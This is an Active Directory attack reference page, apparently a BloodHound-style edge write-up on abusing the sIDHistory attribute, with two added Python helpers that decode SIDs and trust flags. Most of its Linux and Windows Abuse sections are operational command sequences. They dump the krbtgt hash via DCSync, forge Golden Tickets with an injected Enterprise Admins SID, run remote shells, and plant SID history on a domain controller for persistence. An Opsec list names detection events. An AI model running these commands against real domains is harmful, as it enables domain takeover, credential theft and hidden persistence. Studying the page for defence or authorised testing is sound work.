HasSIDHistory

Source principal's sIDHistory attribute contains the SID of the target principal. When the source authenticates, the DC adds every sIDHistory SID to its authorization data (the Kerberos PAC, and the Netlogon validation info for NTLM), so the source is granted whatever the target's SID is granted.

Applies to: User/Computer → User/Group/Domain

If sIDHistory contains the Domain Admins (RID 512) or Enterprise Admins (RID 519) SID of a domain, or another privileged SID from a second domain, the source principal effectively holds those privileges wherever a DC builds its token. Inside the source's own domain this is honored unconditionally; across a trust it depends on whether SID filtering strips the foreign SID. sIDHistory is not writable with an ordinary LDAP modify: it is populated by the DsAddSidHistory API during migrations, or by tampering with a DC directly (see the persistence section under Windows Abuse).


Linux Abuse

Enumerate SID history

# bloodyAD
bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get object '<source-user>' \
  --attr sIDHistory

# ldapsearch
ldapsearch -x -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' \
  -b 'DC=<domain>,DC=<tld>' '(sAMAccountName=<source-user>)' sIDHistory

# NetExec
netexec ldap <dc-ip> -u <username> -p '<password>' -d <domain> \
  --get-sid-history
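ldapsearch returns sIDHistory as base64-encoded binary SIDs (the `::` separator), often folded across lines, and none of the tools above tell you whether a value is a privileged RID or belongs to another domain. The following is an added Python helper, not code from the page or from any of the tools it lists: it unfolds the LDIF, decodes each SID, and flags privileged RIDs and foreign-domain SIDs. The domain SIDs, DNs and account names in the embedded sample are constructed for this example.

```python
import base64
import struct

# RIDs that make a sIDHistory entry an immediate privilege-escalation finding
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",        # forest root only
    519: "Enterprise Admins",    # forest root only
}

def sid_bytes_to_str(blob):
    """Decode a binary SID: revision, sub-authority count, 6-byte big-endian authority, LE sub-authorities."""
    revision, count = blob[0], blob[1]
    if len(blob) != 8 + 4 * count:
        raise ValueError("malformed SID: length %d for %d sub-authorities" % (len(blob), count))
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, blob, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)

def sid_str_to_bytes(sid):
    """Inverse of sid_bytes_to_str; used here only to build the constructed sample."""
    parts = sid.split("-")
    subs = [int(p) for p in parts[3:]]
    return (bytes([int(parts[1]), len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def split_sid(sid):
    """Return (domain_sid, rid) for an S-1-5-21-... account/group SID, (sid, None) for anything else."""
    parts = sid.split("-")
    if len(parts) == 8 and parts[3] == "21":
        return "-".join(parts[:7]), int(parts[7])
    return sid, None

def parse_ldif_sidhistory(ldif):
    """Map each dn in ldapsearch LDIF output to its decoded sIDHistory values."""
    lines = []
    for raw in ldif.splitlines():
        if raw.startswith(" ") and lines:      # LDIF folds long values onto continuation lines
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    result, dn = {}, None
    for line in lines:
        if line.lower().startswith("dn:"):
            dn = line.split(":", 1)[1].strip()
            result.setdefault(dn, [])
        elif line.lower().startswith("sidhistory::") and dn:   # '::' marks a base64 value
            result[dn].append(sid_bytes_to_str(base64.b64decode(line.split("::", 1)[1].strip())))
    return result

def audit_sidhistory(ldif, own_domain_sid):
    """Flag every sIDHistory SID as privileged RID and/or SID from another domain."""
    findings = []
    for dn, sids in parse_ldif_sidhistory(ldif).items():
        for sid in sids:
            domain, rid = split_sid(sid)
            findings.append({
                "dn": dn, "sid": sid,
                "foreign": domain != own_domain_sid,
                "privileged": rid in PRIVILEGED_RIDS,
                "name": PRIVILEGED_RIDS.get(rid, ""),
            })
    return findings

# ---- constructed sample: domain SIDs, DNs and accounts are made up for this example ----
OWN_DOMAIN_SID = "S-1-5-21-1004336348-1177238915-682003330"      # child.corp.local
ROOT_DOMAIN_SID = "S-1-5-21-3623811015-3361044348-30300820"      # corp.local (forest root)
OTHER_DOMAIN_SID = "S-1-5-21-4042487326-1431567190-1812234901"   # legacy.example, migrated from

def _b64(sid):
    return base64.b64encode(sid_str_to_bytes(sid)).decode()

_folded = _b64(ROOT_DOMAIN_SID + "-519")          # folded across two lines like ldapsearch does
SAMPLE_LDIF = f"""dn: CN=svc-migrate,CN=Users,DC=child,DC=corp,DC=local
sAMAccountName: svc-migrate
sIDHistory:: {_b64(OWN_DOMAIN_SID + "-512")}
sIDHistory:: {_folded[:24]}
 {_folded[24:]}

dn: CN=jdoe,CN=Users,DC=child,DC=corp,DC=local
sAMAccountName: jdoe
sIDHistory:: {_b64(OTHER_DOMAIN_SID + "-1105")}
"""

if __name__ == "__main__":
    for f in audit_sidhistory(SAMPLE_LDIF, OWN_DOMAIN_SID):
        mark = "!!" if f["privileged"] else "  "
        scope = "foreign" if f["foreign"] else "own-domain"
        print(mark, f["dn"].split(",")[0], f["sid"], scope, f["name"])
```

Pipe real ldapsearch output into `audit_sidhistory` with your own domain SID (from `lookupsid.py ... 0`); a foreign, non-privileged entry such as jdoe's is the normal residue of a migration, while a same-domain RID 512 or a root-domain RID 519 is the edge this page describes.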

Authenticate as source principal and access target's resources

# If the source user carries a DA/EA SID in sIDHistory, authenticate normally; the KDC puts the privileged SID in the PAC
getTGT.py '<domain>/<source-user>:<password>'
export KRB5CCNAME=<source-user>.ccache

# DCSync if the inherited SID holds replication rights (Domain Admins, Enterprise Admins, Domain Controllers)
secretsdump.py -k -no-pass -dc-ip <dc-ip> '<domain>/<source-user>@<dc-hostname>'

# Access DA-protected resources
wmiexec.py -k -no-pass '<domain>/<source-user>@<target-computer>.<domain>'
smbexec.py -k -no-pass '<domain>/<source-user>@<target-computer>.<domain>'

Cross-domain SID history (inter-forest/trust)

# If SID filtering is disabled on the trust, the foreign SID in sIDHistory survives the trust boundary
# Get a TGT in the child domain as the source user, then target parent-domain resources;
# the child KDC issues a referral ticket for the parent realm (DNS for both realms must resolve)
getTGT.py '<child-domain>/<source-user>:<password>'
export KRB5CCNAME=<source-user>.ccache
secretsdump.py -k -no-pass '<child-domain>/<source-user>@<parent-dc-hostname>'
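Whether the foreign SID survives is decided by the trust's trustAttributes bitmask, readable from the trustedDomain objects in CN=System (for example `ldapsearch ... -b 'CN=System,DC=child,DC=corp,DC=local' '(objectClass=trustedDomain)' name trustAttributes trustDirection securityIdentifier`). The following is an added Python example, not from the page or any tool it lists; the flag values are the documented TRUST_ATTRIBUTE_* constants (MS-ADTS), and the trust names and attribute values in the sample are constructed.

```python
# trustAttributes flags of a trustedDomain object (TRUST_ATTRIBUTE_* constants, MS-ADTS 6.1.6.7.9)
TRUST_ATTRIBUTES = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",       # SID filter quarantine: only the trusted domain's own SIDs pass
    0x0008: "FOREST_TRANSITIVE",        # forest trust
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",            # parent/child or tree-root trust inside one forest
    0x0040: "TREAT_AS_EXTERNAL",        # forest trust with SID history enabled (netdom trust /enablesidhistory:yes)
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

def decode_trust_attributes(value):
    """Return the flag names set in a trustAttributes integer, in bit order."""
    return [name for bit, name in TRUST_ATTRIBUTES.items() if value & bit]

def sid_history_crosses(value):
    """(crosses, reason): does a foreign SID in sIDHistory reach the trusting domain's token?"""
    flags = set(decode_trust_attributes(value))
    if "WITHIN_FOREST" in flags:
        return True, "intra-forest trust: no SID filtering, a root-domain RID 519 in sIDHistory is honored"
    if "FOREST_TRANSITIVE" in flags:
        if "TREAT_AS_EXTERNAL" in flags:
            return True, ("forest trust with SID history enabled: trusted-forest SIDs pass, but RIDs below 1000 "
                          "(512/519) are still filtered, so target a group with RID >= 1000")
        return False, "forest trust: SID filtering on, foreign sIDHistory SIDs are stripped"
    if "QUARANTINED_DOMAIN" in flags:
        return False, "external trust with quarantine: only the trusted domain's own SIDs pass"
    return True, "external trust without quarantine: sIDHistory SIDs pass (verify on the live trust; low RIDs may still be filtered)"

# Constructed sample of trustedDomain objects as seen from the child domain (names and values made up)
SAMPLE_TRUSTS = [
    {"name": "corp.local",       "trustAttributes": 0x20},   # parent of child.corp.local
    {"name": "partner.example",  "trustAttributes": 0x08},   # forest trust, defaults
    {"name": "acquired.example", "trustAttributes": 0x48},   # forest trust, SID history enabled
    {"name": "legacy.example",   "trustAttributes": 0x04},   # external trust, quarantined
]

def assess_trusts(records):
    """One (name, flags, crosses, reason) tuple per trust."""
    return [(r["name"], decode_trust_attributes(r["trustAttributes"]), *sid_history_crosses(r["trustAttributes"]))
            for r in records]

if __name__ == "__main__":
    for name, flags, crosses, reason in assess_trusts(SAMPLE_TRUSTS):
        print("%-18s %-38s %s" % (name, ",".join(flags), "SIDHistory CROSSES" if crosses else "filtered"))
        print("    " + reason)
```

Run this against the decoded trustAttributes of every trust before spending a krbtgt hash on a forged ticket: WITHIN_FOREST is the parent/child case the page describes as exploitable by default, and a FOREST_TRANSITIVE trust without TREAT_AS_EXTERNAL will silently drop the injected SID.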

Golden Ticket with injected SID history (post-DCSync)

# Forge a TGT in the source domain and add the forest root's Enterprise Admins SID as an ExtraSid
# Requires the krbtgt hash of the issuing (source) domain; RID 519 exists only in the forest root domain
lookupsid.py '<source-domain>/<username>:<password>@<source-dc-ip>' 0   # source domain SID
lookupsid.py '<source-domain>/<username>:<password>@<target-dc-ip>' 0   # target (forest root) domain SID

ticketer.py -nthash '<krbtgt-ntlm-hash>' \
  -domain-sid '<source-domain-sid>' \
  -domain '<source-domain>' \
  -extra-sid '<target-domain-sid>-519' \
  'Administrator'

# The forged ticket's principal is Administrator@<source-domain>, so keep the source realm in the target string
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass '<source-domain>/Administrator@<target-dc-hostname>'

Windows Abuse

Verify SID history on an object

Get-ADUser <source-user> -Properties SIDHistory | Select-Object SIDHistory
Get-DomainUser <source-user> -Properties sidhistory

Authenticate and access resources (SID history in PAC is transparent)

# Run as the source user; access is granted through the sIDHistory SIDs the DC places in the PAC
runas /user:<domain>\<source-user> cmd.exe

# Access target domain resources if SID history contains cross-domain privileged SID
ls \\<target-dc>.<target-domain>\c$

Mimikatz β€” inject SID history into Golden Ticket

mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt

mimikatz # kerberos::golden /user:Administrator /domain:<source-domain> /sid:<source-domain-sid> \
  /krbtgt:<krbtgt-ntlm-hash> /sids:<target-domain-sid>-519 /ptt

Add SID history to an account (persistence; needs DA-level access to a DC, since sIDHistory cannot be written over LDAP)

# DCs up to Windows Server 2012 R2 (Mimikatz patches the NTDS code inside lsass)
mimikatz # privilege::debug
mimikatz # sid::patch
mimikatz # sid::add /sam:<attacker-user> /new:<target-sid>

# Windows Server 2016+ (offline edit of ntds.dit with DSInternals; NTDS must be stopped first)
Stop-Service NTDS -Force
Add-ADDBSidHistory -SamAccountName <attacker-user> -SidHistory '<target-sid>' `
  -DBPath 'C:\Windows\NTDS\ntds.dit' -Force
Start-Service NTDS

Opsec

  • SID history abuse is transparent: the source user authenticates normally and the DC adds the privileged SID to the token; no LDAP write, no group-membership change
  • Within a domain, sIDHistory is honored unconditionally; across a trust the foreign SID survives only if SID filtering is off on that trust (check trustAttributes on the trustedDomain object)
  • Intra-forest trusts (parent/child, tree-root): SID filtering off by default, so the full path works without any filtering bypass
  • Inter-forest (forest/external) trusts: SID filtering on by default; the ExtraSids attack is blocked unless filtering was explicitly relaxed (netdom trust /quarantine:no on an external trust, /enablesidhistory:yes on a forest trust)
  • Adding sIDHistory for persistence means stopping NTDS (System Event ID 7036, "entered the stopped state") or patching lsass on a DC; both are loud on a monitored DC
  • Golden Ticket with ExtraSids: 4768/4769 do not record the PAC's SIDs, so detection relies on a 4769/4624 for a user with no matching 4768 on any DC, on Event ID 4627 (group membership) showing a SID from another domain, or on a DC-side PAC check; well-tuned SIEM rules catch this